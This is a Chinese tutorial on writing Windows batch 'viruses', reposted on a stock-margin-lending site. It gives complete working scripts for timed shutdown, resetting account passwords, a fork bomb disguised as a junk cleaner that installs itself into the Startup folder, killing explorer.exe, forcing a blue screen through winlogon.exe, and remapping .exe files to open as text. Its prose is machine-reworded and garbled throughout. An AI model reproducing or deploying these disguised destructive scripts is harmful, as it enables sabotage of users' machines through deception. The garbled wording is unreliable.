手机版
 找回密码
 立即注册
理财客 配资 东南配资
  • QQ空间
  • 回复
  • 收藏

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭

culittlewhite 2020-2-14 15:20 368人围观 7*24快讯

【编者按】病毒这个不速之客让人谈之色变,它像一个藏在斗篷侠下的黑衣人,被“光顾”的人就会倒霉。本文为作者的网络安全自学教程系列文章之一,将教学简朴的病毒原理知识,并通过批处理处罚代码制作病毒,包罗主动启、修改暗码、定时关机、蓝屏、历程关闭等功能。盼望这篇底子文章对各人有所资助,更盼望各人进步安全意识,学会干系防范,也欢迎各人讨论。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

作者 | 杨秀璋

责编 | 夕颜

本文授权转载自CSDN博客专家Eastmount

声明:本人果断反对利用教学方法举行犯罪的运动,齐备犯罪运动必将受到重办,绿色网络须要我们共同维护,更保举各人相识它们背后的原理,更好地举行防护。

一.关机bat脚本

盘算机病毒(Computer Virus)是体例者在盘算机步调中插入的粉碎盘算机功能大概数据的代码,能影响盘算机利用,能自我复制的一组盘算机指令大概步调代码。盘算机病毒具有流传性、潜伏性、感染性、埋伏性、可引发性、体现性或粉碎性。

盘算机病毒的生命周期:开发期→感染期→埋伏期→发作期→发现期→消化期→灭亡期。盘算机病毒是一个步调,一段可实行码。就像生物病毒一样,具有自我繁殖、相互感染以及激活再生等生物病毒特性。盘算机病毒有独特的复制本领,它们可以大概快速伸张,又经常难以根除。它们能把自身附着在各种范例的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就陪伴文件一起伸张开来。

下面教学第一个批处理处罚脚本,重要是调用“shutdown”实现关机。其根本步调如下:

  • 新建文本文档
  • 输入 shutdown -s -t 600
  • 把txt改成bat

如下图所示,运行CMD可以查察shutdown下令的根本用法。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

根本下令为:

1shutdown -s -t 600

2//现在让体系600秒之后关机

3

4shutdown -a

5//停止关闭盘算机

运行效果如下图所示:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

新建“test.bat”并填写“ shutdown -s -t 600”,某些体系须要在“文件夹选项”中,表现“潜伏已知文件范例的扩展名”。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

双击BAT文件即运行关机,如果须要取消,还是在CMD黑框中输入“shutdown -a”下令。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

二.修改暗码和定时关机病毒

接下来分享一个比力完备的病毒制作过程。

第一步,新建game.bat文件。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

步调编写如下所示,此中“@echo off”体现关闭回显,“color 0a”体现设置颜色。

1@ echooff

2color 0a

3title Eastmount步调

4

5echo===================================

6echo菜单

7echo1.修改管理员暗码

8echo2.定时关机

9echo3.退出本步调

10echo===================================

11

12pause

运行效果如下图所示,可以看到标题为“Eastmount步调”,而且包罗干系内容,这就是批处理处罚文件实行过程。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

第二步,做一个选择判断,该步调须要和用户举行互动。

焦点代码为“set /p num=您的选择是:”,其体现设置变量num,“/p”体现停息并期待用户输入,用户终极输入的值赋为num。

1@ echooff

2color 0a

3title Eastmount步调

4

5echo===================================

6echo菜单

7echo1.修改管理员暗码

8echo2.定时关机

9echo3.退出本步调

10echo===================================

11

12set/p num=您的选择是:

13

14pause

输出效果如下图所示:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

第三步,增补修改管理员暗码、定时关机、退出等下令。

1netuser administrator 123456

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

第二个选项是关机,下令如下:

1shutdown-s -t 100

第三个选项是退出本步调。

1exit

接着编写判断和跳转批处理处罚代码,代码如下所示,“>nul”体现不输出运行提示信息。

1@ echooff

2color 0a

3title Eastmount步调

4

5:menu

6echo===================================

7echo菜单

8echo1.修改管理员暗码

9echo2.定时关机

10echo3.退出本步调

11echo===================================

12

13set /p num=您的选择是:

14if"%num%"== "1"goto1

15if"%num%"== "2"goto2

16if"%num%"== "3"goto3

17

18: 1

19net user administrator 123456> nul

20echo您的暗码已经设置乐成!

21pause

22gotomenu

23

24: 2

25shutdown -s -t 100

26gotomenu

27

28: 3

29exit

此时输入“1”会提示体系错误,如下图所示:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

同时,杀毒软件也会提示黑客修改电脑,点击“答应利用”即可,

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

接着增长“cls”下令清屏。同时,为了制止输入数字“4”会重新实行到尾,增补一个提示信息。代码修改如下:

1@ echooff

2color 0a

3title Eastmount步调

4

5:menu

6cls

7echo===================================

8echo菜单

9echo1.修改管理员暗码

10echo2.定时关机

11echo3.退出本步调

12echo===================================

13

14set /p num=您的选择是:

15if"%num%"== "1"goto1

16if"%num%"== "2"goto2

17if"%num%"== "3"goto3

18

19echo您好!请输入 1-3精确的数字

20pause

21gotomenu

22

23: 1

24net user administrator 123456>nul

25echo您的暗码已经设置乐成!

26pause

27gotomenu

28

29: 2

30shutdown -s -t 100

31gotomenu

32

33: 3

34exit

此时运行如下图所示:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

继续修改代码,增补设置的用户名和新暗码,关机时间等。

1@ echooff

2color 0a

3title Eastmount步调

4

5:menu

6cls

7echo===================================

8echo菜单

9echo1.修改管理员暗码

10echo2.定时关机

11echo3.退出本步调

12echo===================================

13

14set /p num=您的选择是:

15if"%num%"== "1"goto1

16if"%num%"== "2"goto2

17if"%num%"== "3"goto3

18

19echo您好!请输入 1-3精确的数字

20pause

21gotomenu

22

23: 1

24set /p u=请输入用户名:

25set /p p=请输入新暗码:

26net user %u% %p% >nul

27echo您的暗码已经设置乐成!

28pause

29gotomenu

30

31: 2

32set /p time=请输入时间:

33shutdown -s -t %time%

34gotomenu

35

36: 3

37exit

以“管理员身份运行”后,乐成修改“xiuzhang”用户的开机暗码。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

输入2可以设置关机时间,这里就不再赘述,第一部分已经具体教学。

三.自启动死机病毒

接着编写一个伪装成“体系垃圾整理”的代码,它着实是一个导致体系死机的代码,也不能算是“病毒”,更多是一个恶作剧步调。其原理是不绝打开CMD步调,占用体系资源从而导致死机,而且每次开机都会主动启。

PS:这里夸大一句,发起各人在假造机中运行该代码。我们作为安全工程师,盼望您们去相识弊端背后的原理,更好地举行防御,绿色网络须要我们共同维护,杜绝齐备违法运动。

第一步,在C:windows目次下创建文件“windows.bat”。一个“>”体现覆盖文件内容,两个“>>”体现追加一句话至文件末了。

1echostart cmd >c:windowswindows.bat

2echo%0>>c:windowswindows.bat

用户打开这个步调之后,步调就会不绝打开cmd,占用体系资源,导致体系瘫痪,%0是再次实行该步调的意思。但是,如许只能让用户死机一次,重启体系以后,不再打开这个文件以后,就不再见中招了。

第二步,将这个恶意脚本放到开机菜单中,每次开机都主动启动运行并导致电脑死机。

errorlevel为预界说变量,随着体系变革而变革。如果为0体现上一条下令实行乐成,如果非0体现上一条下令实行失败,它不是Win7体系,而实行下面这条下令(XP体系、2003体系)。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

代码“echo.”体现空行,好比代码:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

输出效果如下图所示:

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

第三步,接着编写next地区代码,完备代码如下所示。

1@echo off

2title 体系垃圾整理

3color 2f

4echo =====如有杀毒软件恶意拦截,请选择【答应步调的全部利用】====

5echo.

6echo.

7

8echo start cmd >c:windowswindows.bat

9::echo %% 0>>c:windowswindows.bat

10

11copy c:windowswindows.bat "%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup">nul

12if%errorlevel%== 0gotonext

13

14copy c:windowswindows.bat "%USERPROFILE%「开始」菜单步调启动">nul

15if%errorlevel%== 1gotoerror

16

17: next

18echo.

19echo.

20echo =====垃圾整理中,请不要关闭窗口=========

21echo.

22ping -n 5127.0.0.1>nul

23echo.

24echo =====垃圾整理完毕,共整理垃圾 500M=======

25echo.

26echo.

27echo =====发起立即重启电脑==========

28pause

29

30: error

31echo.

32echo.

33echo ======步调运行失败,请【利用管理员权限】重新运行!========

34echo.

35pause

注意,我表明了重复利用代码“::echo %%0>>c:windowswindows.bat”,否则开机自启动很贫困。接着运行代码,如下图所示,须要右键“以管理员身份运行”。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

代码会在C:windwos目次下创建批处理处罚文件“windows.bat”。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

同时,在我的Win10体系开机主动动目次下也有该文件。

目次:…AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

打开该文件可以看到写入的“start cmd”代码,体现打开CMD。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

双击该“windows.bat”文件,运行效果如下图所示。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

总结:本文编写了一个体系整理工具,着实是把这个windows.bat写到用户的开机自启动目次下,到达用户每次开机,都会运行该步调的目的,重复调用CMD占用资源。如果中了该病毒,用户可以利用PE到开启启动目次把windows.bat文件删除,大概重装体系,再次发起各人别让它重复运行。

四.历程关闭病毒

再看一个伪装垃圾整理的批处理处罚代码。该下令是杀死历程,“/im explorer.exe”体现要杀死的历程名称,关闭桌面;“/f”体现逼迫杀死;“>nul”体现在屏幕上不要输出任何信息。

1taskkill/im explorer.exe /f >nul 2>nul

完备代码如下所示,此中“Start c:windowsexpolrer.exe”体现继续开启桌面,“ping -n 5 127.0.0.1>nul”用于斲丧时间。

1@ echooff

2title 体系垃圾整理

3color 2f

4echo=====如有杀毒软件恶意拦截,请选择【答应步调的全部利用】====

5echo.

6echo.

7echo.

8echo=====垃圾整理中,请不要关闭窗口=========

9echo.

10ping -n 5127.0.0.1>nul

11taskkill /im explorer.exe /f >nul 2>nul

12echo.

13echo=====拐了,你的体系已经废了=======

14echo.

15ping -n 5127.0.0.1>nul

16echo.

17Start c:windowsexplorer.exe

18echo.

19echo=====已经修复好!是不是吓坏了!!O(∩_∩)O==========

20pause

运行该批处理处罚步调,桌面会消散,如下图所示。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

过一会桌面又会规复。由于作者桌面东西太乱,这里仅表现壁纸展示。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

五.最简朴的蓝屏炸弹文件

  • 新建文本文档
  • 输入:ntsd -c q -pn winlogon.exe,体现逼迫杀死历程
  • 工具->文件夹选项->查察->“潜伏已知文件范例的扩展名”勾选
  • txt修改为bat
  • 开始->步调->启动,打开game.bat文件

黑客很少攻击个人,一样寻常攻击服务器,该下令对2003的服务器特殊有杀伤力

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

双击之后,服务器直接蓝屏表现并重启。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

ntsd从Windows 2000开始就是体系自带的历程调试工具,在system32目次下。ntsd的功能非常的强盛,用法也比力复杂,但如果只用来竣事一些历程,那就比力简朴了。在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,末了谁人是Win32子体系,ntsd自己须要它。lsass.exe也不要杀掉,它是负责当地账户安全的。被调试器附着的历程会随调试器一起退出,以是可以用来在下令行下停止历程。

打开cmd 后输入以下下令就可以竣事历程:

  • 方法一:利用历程的PID竣事历程

下令格式:ntsd -c q -p pid

下令范例:ntsd -c q -p 1332 (竣事explorer.exe历程)

范例详解:explorer.exe的pid为1332,但是怎样获取历程的pid呢?在CMD下输入TASKLIST就可以获取当前使命管理器全部历程的PID。大概打开使命管理器,在菜单栏,选择“查察”->“选择列”,在打开的选择项窗口中将“PID(历程标识符)”项选择钩上,如许使命管理器的历程中就会多出PID一项了。PID的分配并不固定,是在历程启动是由体系随机分配的,以是历程每次启动的历程一样寻常都不会一样。

  • 方法二:利用历程名竣事历程

下令格式:ntsd -c q -pn xxxx.exe (xxxx.exe 为历程名,exe不能省)

下令范例:ntsd -c q -pn explorer.exe

别的的能竣事历程的DOS下令尚有taskkill和tskill下令。

六.最简朴的扩展名病毒

将文件格式修改或文档加密都是常见的病毒,好比永恒之蓝、打单病毒等,它们就是将电脑内的全部资料、文档加密,当你要打开文件时,须要暗码,此时通过比特币付费举行打单。

下面这个小利用是将exe文件修改为txt文档。当碰到可实行的exe文件,会以为它是一个txt文档,用记事本打开,导致可实行步调运行不起来,这是就是这个病毒的原理。

  • 新建文本文档
  • 增长代码:assoc.exe=txtfile
  • 工具->文件夹选项->查察->“潜伏已知文件范例的扩展名”勾选
  • txt修改为bat
  • 开始->步调->启动,打开bat文件

双击运行bat文件之后,我们的可实行文件就酿成了txt文件。此时体系以为exe就是txt步调,把体系的关联搞紊乱了,它规复起来很贫困。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

EXE步调打开如下图所示。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

以致打开CMD都是TXT文本文件。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

接着须要实行下面的下令还原exe文件。

  • assoc.exe=exefile

还原的代码及效果如下图所示。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

其他全部文件格式都转换为txt文件,如下所示。此时,如果潜伏文件扩展名,以致可以修改图标伪装成目的应用,当用户点击时会实行这些粉碎;但由于不知道目的是否有潜伏文件扩展名,还是不发起这种“笨”方法。

1assoc.htm=txtfile

2assoc .dat=txtfile

3assoc .com=txtfile

4assoc .rar=txtfile

5assoc .gho=txtfile

6assoc .mvb=txtfile

7...

办理方法:

如果您不幸中了该病毒,怎么办理呢?如下图所示,还原全部精确关联即可。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

PS:尚有一些病毒,好比VBS脚本、网页弹窗(网站垂纶)等,这里不再教学,保举读者阅读前文“[网络安全自学篇] 二十五.Web安全学习蹊径及木马、病毒和防御初探”。如果把病毒步调放到启动项,每次开机都会主动实行。

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

七.总结

写到这里,这篇文章就先容竣事了,盼望对您有所资助。这里也保举各人阅读参考文献的文章和视频。这篇文章也存在一些不敷,作者没有深入明白其原理,也是作为网络安全初学者的逐步发展路吧!盼望将来能更透彻撰写干系文章。

盼望这系列文章对您有所资助,真的感觉自己技能佳肴,要学的知识许多多少。这是第44篇原创的安全系列文章,从网络安全到体系安全,从木马病毒到后门挟制,从恶意代码到溯源分析,从渗出工具到二进制工具,尚有Python安全、顶会论文、黑客比赛和弊端分享。未知攻焉知防,人生漫漫其路远兮,作为初学者,自己真是爬着前行,感谢许多人的资助,继续爬着,继续加油!

欢迎各人讨论,是否以为这系列文章资助到您!任何发起都可以批评告知读者,共勉。

侠之为大,为国为民。向一线医护职员、武士、工人、科学家和全部工作者致敬。咱们中国人一生的最高寻求,为天地立心,为生民立命,为往圣继绝学,为万世开清静,他们真的做到了。生存哪有什么光阴静好,只不外这些人替我们负重前行。盼望每一个人都康健安全,戴口罩不出门,勤洗手多用饭。武汉加油,湖北加油,中国加油。众擎易举,加油必胜!!!

病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭_7*24快讯_2020-2-14 15:20发布_配资查_www.peizicha.com

原文链接:

知道Python怎样支援抗“疫”吗?2月15日(全天)Python线上峰会免费学!6场英华分享,用代码“抗”疫!

两种报名方式:

1.点击“立即报名”--结算时利用优惠码“pythonday”,代价变为“0"元--提交订单,免费加入

2.点击“立即报名”--付款“19元”报名--集会会议官网公示姓名--为疫区捐钱表心意

具体日程请见下方海报


本文来自配资查|www.peizicha.com 自网络收集整理。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

鲜花

握手

雷人

路过

鸡蛋
温馨提示:以上内容仅为信息传播之需要,不做任何投资建议,如有侵犯版权,请联系配资查门户 客服人员进行删除处理,谢谢! 配资查股票配资门户网是国内专业的股票配资门户网,是炒股配资和配资交流的首选之站 - www.peizicha.com
我有话说......